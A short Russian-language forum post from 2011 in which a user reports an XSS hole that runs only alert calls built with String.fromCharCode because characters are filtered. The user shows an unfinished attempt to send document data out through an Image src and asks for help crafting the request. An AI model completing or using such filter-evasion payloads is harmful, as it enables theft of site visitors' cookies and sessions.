09.06.2011, 05:41
|
|
Познающий
Регистрация: 18.12.2010
Сообщений: 35
С нами:
8105366
Репутация:
0
|
|
Есть xss, выполнить можно только
Сообщение от None
alert(String.fromCharCode(98,108,97,45,98,108,97))
Ну или просто
Сообщение от None
alert(/asd/)
Символы как:
Фильтруются.
Пробовал по разному, и так:
Сообщение от None
img = new Image(); img.src = String.fromCharCode(...)+document.....
И просто даже все брал в String.fromCharCode.
Но все безуспешно. Помогите плиз, правильно составить запрос. |
|
|